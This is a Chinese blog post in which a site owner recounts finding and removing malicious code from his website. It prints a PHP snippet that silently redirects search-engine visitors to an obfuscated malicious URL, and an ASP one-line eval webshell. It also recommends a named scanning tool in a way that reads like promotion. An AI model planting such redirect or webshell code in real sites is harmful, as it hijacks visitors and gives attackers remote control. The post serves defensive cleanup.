青島峰會期間本來想給自己放幾天假的,因為網站的挂馬給泡湯了,打開網站首頁,使用浏覽器的源代碼功能,發現自己網站的首頁多了很多木馬代碼,于是我連接配接FTP檢視網站首頁的代碼中發現了這個挂馬代碼,下面我把代碼貼出來 :
<?phperror_reporting(0);if(eregi('google|soso|sogou|baidu',$_SERVER['HTTP_REFERER']) ){ echo '<>window.location.href="http://www."+"tao"+"8s"+".in"+"fo";</>';}
惡意的挂馬網址 www.tao8s.info
解釋一下:這個代碼是 PHP的代碼是一種條件性的挂馬,上面的google soso sogou baidu 都是挂馬的條件,意思就是當從 google soso...等等搜尋引擎來的通路客戶會自動在網頁上隐藏一行代碼也就是挂馬代碼。
通路這個網站的使用者,一般都會被360和百度提示網站有風險和網站挂馬提示的,但是這個挂馬為什麼不提示呢? 這裡我給大家解密下,不要以為病毒都會被防毒軟體殺掉,防毒軟體也不是萬能的,就像警察抓小偷,警察不知道小偷的特征怎麼去抓捕呢? 殺毒和這個道理一樣的是根據特征來的,有一些病毒出來的早,沒有被殺毒跟蹤到,是以360和百度也不會有什麼安全挂馬提示(一般業界人士稱“免殺病毒”。
說的有點多,言歸正傳。說點幹貨,那遇到這種情況咋辦啊,我的解決辦法就是先查清楚病因後除根,于是用FTP把網站程式全部打包下來然後一個一個檔案的檢查,看看有沒有其他名字的檔案,我在網上查到一般木馬檔案名字都是global.asa global.asp 啥的,反正是些不熟悉的檔案名,檢查了一下沒有發現特殊的檔案名字,于是開始檢查代碼方面,都知道程式員寫代碼能累死,于是在百度上查到了一個叫sinesafe的網站挂馬代碼檢查工具,這個工具是專門檢查挂馬代碼的和木馬代碼的。我把網站程式的代碼檔案放到工具檢測了一下,發現了木馬代碼 <%eval request("hack")%> eval的特征代碼,找到這個代碼後我就給删除了,重複的用挂馬檢測工具檢查了好幾遍,沒有發現問題後,我這才放心。連接配接到FTP,把網站程式重新上傳了一遍,網站這才穩定下來。
折騰了我一天,連午睡都沒撈着睡,困死我了。以上就是我網站被挂馬後的解決經曆,有什麼不懂的也随時歡迎大家與我交流探讨。
![碼農隻是一碗青春飯,準程式員該怎麼規劃自己的職業生涯。[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)